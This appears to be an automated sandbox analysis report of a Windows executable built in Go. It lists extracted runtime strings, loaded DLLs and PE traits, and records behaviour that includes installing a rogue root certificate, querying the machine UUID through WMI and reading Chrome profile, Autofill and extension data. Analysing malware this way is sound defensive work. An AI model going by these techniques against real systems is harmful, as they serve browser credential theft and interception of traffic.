Source: 5EvHHcMjRg.exe	String found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: 5EvHHcMjRg.exe	String found in binary or memory: concurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: 5EvHHcMjRg.exe	String found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: 5EvHHcMjRg.exe	String found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: 5EvHHcMjRg.exe	String found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: 5EvHHcMjRg.exe	String found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: 5EvHHcMjRg.exe	String found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: 5EvHHcMjRg.exe	String found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: 5EvHHcMjRg.exe	String found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: 5EvHHcMjRg.exe	String found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: 5EvHHcMjRg.exe	String found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: 5EvHHcMjRg.exe	String found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable t
Source: 5EvHHcMjRg.exe	String found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: ) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser are
Source: 5EvHHcMjRg.exe	String found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser are
Source: 5EvHHcMjRg.exe	String found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime:
Source: 5EvHHcMjRg.exe	String found in binary or memory: superfluous leading zeros in lengthP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputtransform: short destination bufferJSON value is not a structure (%#v)9d3f624caca482e8209131a76fc6dc09032c9d2d98b5769dcc48087ef7011677c5340e5d970f361a447a05fb5c2d752f0690854026fcbytes.Reader.Seek: negative positioncrypto/cipher: input not full blocksjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: 5EvHHcMjRg.exe	String found in binary or memory: superfluous leading zeros in lengthP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than inputtransform: short destination bufferJSON value is not a structure (%#v)9d3f624caca482e8209131a76fc6dc09032c9d2d98b5769dcc48087ef7011677c5340e5d970f361a447a05fb5c2d752f0690854026fcbytes.Reader.Seek: negative positioncrypto/cipher: input not full blocksjson: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodslfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: 5EvHHcMjRg.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Source: 5EvHHcMjRg.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 5EvHHcMjRg.exe

Static file information: File size 16819200 > 1048576

Source: 5EvHHcMjRg.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x441000
Source: 5EvHHcMjRg.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x7d4c00
Source: 5EvHHcMjRg.exe	Static PE information: Raw size of /65 is bigger than: 0x100000 < 0x118c00

Source: 5EvHHcMjRg.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 5EvHHcMjRg.exe	Static PE information: section name: /4
Source: 5EvHHcMjRg.exe	Static PE information: section name: /19
Source: 5EvHHcMjRg.exe	Static PE information: section name: /32
Source: 5EvHHcMjRg.exe	Static PE information: section name: /46
Source: 5EvHHcMjRg.exe	Static PE information: section name: /65
Source: 5EvHHcMjRg.exe	Static PE information: section name: /78
Source: 5EvHHcMjRg.exe	Static PE information: section name: /90
Source: 5EvHHcMjRg.exe	Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

Code function: 0_2_00AED2A0 push es; retn 0000h

0_2_00AED2A7

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_0	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior

Source: 5EvHHcMjRg.exe, 00000000.00000002.1922414226.00000000006CE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
